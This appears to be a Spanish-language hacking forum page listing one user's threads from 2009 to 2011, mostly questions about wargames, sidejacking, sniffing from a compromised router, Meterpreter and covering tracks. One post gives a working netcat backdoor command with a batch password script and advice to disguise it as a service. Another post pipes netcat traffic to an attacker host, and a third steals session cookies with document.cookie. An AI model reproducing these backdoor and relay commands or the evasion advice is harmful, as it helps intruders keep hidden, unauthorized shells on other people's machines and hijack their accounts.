Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - R007h

#1
Desafíos - Wargames / permisos archivo passwd
21 Marzo 2011, 06:50 AM
hola,

resulta que estoy tratando de jugar al wargame de roothack.org (shell) y estoy en el nivel 2,

yo soy el usuario level1
bueno la cosa es que hay un archivo passwd.txt que pertenece al usuario level2 (al que yo tengo que llegar) y obviamente no puedo leerlo...

y tambien en la carpeta home de level 2 hay una carpeta con dos binarios

uno es ./bash y el otro es ./sh , y al ejecutarlos funcionan igual que /bin/bash y /bin/sh y estos dos archivos pertenecen a root.

como hago para leer el contenido de passwd.txt??


[level1@erinys home]$ ls -la -R level2
level2:
total 24
drwxr-xr-x  5 root   root   4096 Aug 31  2010 .
drwxr-xr-x 11 root   root   4096 Mar 24  2009 ..
lrwxrwxrwx  1 root   root     12 Mar 24  2009 .bash_history -> /dev/urandom
drwxr-xr-x  2 root   root   4096 Aug 31  2010 bin
drwxr-xr-x  2 root   root   4096 Mar 24  2009 password
-rw-r--r--  1 level2 level2   44 Aug 31  2010 .profile
drwx------  2 level2 level2 4096 Aug 22  2007 .ssh

level2/bin:
total 4072
drwxr-xr-x 2 root root    4096 Aug 31  2010 .
drwxr-xr-x 5 root root    4096 Aug 31  2010 ..
-rwxr-xr-x 1 root root 2080033 Aug 31  2010 bash
-rwxr-xr-x 1 root root 2080033 Aug 31  2010 sh

level2/password:
total 12
drwxr-xr-x 2 root   root   4096 Mar 24  2009 .
drwxr-xr-x 5 root   root   4096 Aug 31  2010 ..
-rw-r----- 1 level2 level2   68 Aug 25  2007 passwd.txt
ls: cannot open directory level2/.ssh: Permission denied



ya intente haciendo

./bash -c "cat passwd.txt"

pero lo que mas me extraña de esto es que cuando ejecuto por ejemplo

./bash -c "whoami"
level1

que si el archivo ./bash le pertenece a root no deberia ejecutarse con permisos de root??

ayudaa! estoy trabadisimo.
Salu2
#2
Hacking / En que tipo de VPN estoy?
20 Febrero 2011, 06:42 AM
Tal vez es una pregunta tonta pero...

como puedo saber en que tipo de VPN estoy loggeado?? gracias

Salu2
#3
Hola,

Que pasa si el atacante y la victima estan detras de un router/firewall y no se tiene acceso a ninguno de los dos(routers)?

Hay alguna manera de utilizar MSF a travez de IRC?

Existe algun *MSFProxy*?

Escenario: La computadora del atacante se encuentra detras de un router al cual no se tiene acceso. La computadora objetivo tambien se encuentra detras de un router al cual no se tiene acceso. La computadora objetivo tiene un navegador vulnerable, y corre con un usuario restringido (no administrador).

Seria posible utilizar netcat como proxy para redirigir un ataque de MSF al browser?

Funcionaria si se redirecciona el ataque a travez de una computadora con acceso directo a inet o que esta detras de un router del que se tiene acceso utilizando netcat asi:

nc -d -L -p 8080 | nc ip.del.atacante.org 8080


Gracias, espero respuestas creativas xD jaja
Salu2
#4
Hacking / Sniffar desde el router con BusyBox
24 Noviembre 2010, 21:40 PM
Hola,

Bueno, digamos que logro obtener acceso a un router con linux embebido (BusyBox) y quiero sniffear datos que van con SSL, como se hace ?, es decir, siempre he sniffeado desde otra computadora, no desde el router, me imagino que en este caso no debo utilizar el arpspoof porque todos los paquetes ya pasan por el router no?

en conclusion: Como se sniffea desde un router?

Salu2
#5
Hacking Wireless / antenna/router/tarjeta
8 Octubre 2010, 19:39 PM
hola !

hace poco me hice con una antenna KOZUMI http://www.kozumi-usa.com/new/products/WISP/AFO2v3.html que tiene un router y una tarjeta wi-fi integrada...
la duda es si hay alguna forma de usar estas cosas para wi-fi hacking...

segun lo que vi es dificil..


espero sus opinioones ...

Gracias
Salu2
#6
Bugs y Exploits / Duda Buffer Overflow
15 Abril 2010, 05:32 AM
Hola,

resulta que estoy auditando un programa en busqueda de buffer overflows,
este programa se pone a la escucha de comandos en un puerto determinado,
cuando a uno de esos comandos le paso como parametro mas de 2048 bytes el programa se cierra,
pero se cierra sin mostrar esa tipica ventana de enviar error...

en conclusion, el programa es explotable?

por que se cierra sin mostrar la ventana de error?

que se puede hacer para explotar un BoF?

me debo conformar solo con el DoS?

Gracias de antemano,

Salu2
#7
Hacking / ok, estoy en el router..
18 Febrero 2010, 05:12 AM
Weno, amigos estoy dentro del router... estoy auditando una red completamente desde el exterior, consegui el acceso al router... pero ahora que?? es decir, como seguir, que hacer?? que posibilidades tengo??

me podrian comentar que es lo que podria hacer de aqui en mas ??
que hacen uds una vez consiguen el acceso a un router?? xD

haganme volar la imaginacion xD

Gracias
Salu2
#8
Nivel Web / Cookies
2 Febrero 2010, 12:05 PM
Resulta que estoy husmeando sobre esto del sidejacking y me paso esto y no c por que...

bueno, resulta que primero hice una prueba, a ver si esto de robar las cookies realmente funcionaba.. entonces, lo primero que hice.. me meti en el foro, e ingrese a mi cuenta, luego en la barra de direcciones pongo

javascript: prompt("",document.cookie);

y efectivamente me salen las cookies de foro.elhacker.net ...
las copio y las pego en un archivo de texto cualquiera. Despues voy al foro, y salgo de mi cuenta.. hasta ahora, perfecto...

luego, con la ayuda de cookie edit (una extension de firefox para manipular cookies) entro a ver las diferencias entre las cookies del archivo de texto (cuando el user esta logged in) y las del navegador (cuando el user esta logged out), y me doy cuenta que hay una variable llamada elhackernet, que es la unica que cambia... entonces creo esta cookie con el cookie edit, pongo guardar y recargo la pagina del foro...

Perfecto! el foro aparecia como si yo hubiera ingresado a mi cuenta!..

despues borro todas las cookies del sitio y lo intento nuevamente...

entro al foro, ingreso a mi cuenta, y coloco javascript: prompt("",document.cookie);
pero esta vez la cookie elhackernet ya no aparecia...

entonces voy al cookie edit para ver si esta cookie existia... si existia...

las preguntas de la cuestion son:

por que si existe una cookie al hacer javascript: prompt("",document.cookie); no me la muestra como la primera vez??

(todo esto lo hice en firefox, lo intente en GChrome y la cookie elhackernet no salio ni la primera vez)

Tienen los navegadores algun sistema de seguridad para las cookies criticas que guardan la sesion??

por qué la primera vez se mostró la cookie elhackernet y despues de haberla "falsificado" ya no se muestra al hacer document.cookie de javascript??

Se hizo un poquito largo pero espero que me hallan entendido, y que puedan aclarar mis dudas...

Grax
Salu2
#9
Hacking / Sidejacking
2 Febrero 2010, 10:53 AM
Pregunta: Cuando uno sniffea una red... aunque una conexion sea https las cookies viajan sin cifrar?

es decir, yo puedo sniffar el trafico para guardarme todas las cookies y asi entrar a una cuenta de Gmail por ejemplo?? utilizando las cookies sniffadas...


Grax
Salu2
#10
Hacking / Login en backdoor con Netcat
6 Enero 2010, 09:28 AM
Supongamos que tenemos una backdoor con netcat a la escucha en algun puerto de alguna computadora en algun lugar... y no queremos que cualquiera de casualidad se conecte a ese puerto y como por arte de magia le caiga del cielo una shell xD es por eso que le vamos a poner una peticion de contraseña antes de que nc nos brinde la shell..

hacemos un...

nc -d -L -e login.bat -p 777


y en el login.bat

@echo off
echo Esta es una backdoor privada xD
echo Password:
echo.
set /p pass=
if %pass%==password (cmd) else (exit)


Obviamente no vais a ser tan obvios de decir "hey eso es una backdoor jajaj" pero puedes simular ser un servicio, o hacer un pequeño server con batch o con wscript o con cualquiera que se te ocurra (nombro batch y wscript porque son los que hay en casi todos los PC) puedes usar la funcion GetPassword de wscript en vez del .bat...

La idea era hacernos recordar que el flag -e del nc no solo cirve para ponerle cmd.exe o /bin/bash xD

En fin, esto es algo extremadamente simple (a veces las cosas simples son lo mas apropiado), pero el limite de netcat esta en el limite de tu imaginación xD
Salu2
#11
Hacking / Duda con Meterpreter.
29 Diciembre 2009, 19:59 PM
Hola,

bueno, resulta que tengo un equipo backdooreado con netcat.. que hace un reverseShell a mi maquina...
ahora quiero pasarle el meterpreter xD pero no c como...

puedo usar la conexion que me da netcat para enviar el payload a traves de msf?
o debo generar el payload metsvc y subirlo de algun modo a la maquina remota y despues ejecutarlo? (la maquina remota esta detras de un router asi que supongo que debe ser el windows/metsvc_reverse_tcp)

intenté generar el payload windows/metsvc_reverse_tcp pero... donde rayos queda el payload generado?
es un ejecutable que le puedo pasar a la victima?

Graxias de antemano
Salu2
#12
Hacking / Tecnicas de ocultamiento.
27 Diciembre 2009, 06:30 AM
hola,

resulta que me enfoque tanto tanto en como penetrar un sistema que no me percate de como ocultar mis huellas xD...

quisiera si me recomiendan algunos manuales o tutoriales de tecnicas para el ocultamiento.. ya sea borrar logs, proxys, escanear detras de proxys... etc.

desde ya muchas gracias xD
Salu2
#13
Scripting / Python reverse shell on Windows
16 Agosto 2009, 19:24 PM
Hola, estoy empezando en la programación python y estuve experimentando con el modulo socks, es muy interesante xD

bueno, resulta que estaba tratando de hacer una reverse shell pero lo unico que se es ejecutar comandos asi: os.system(comando);

pero, alguien sabria decirme como redireccionar todo el cmd.exe un puerto?

o sea la I/O del cmd xD

grax! xD
salu2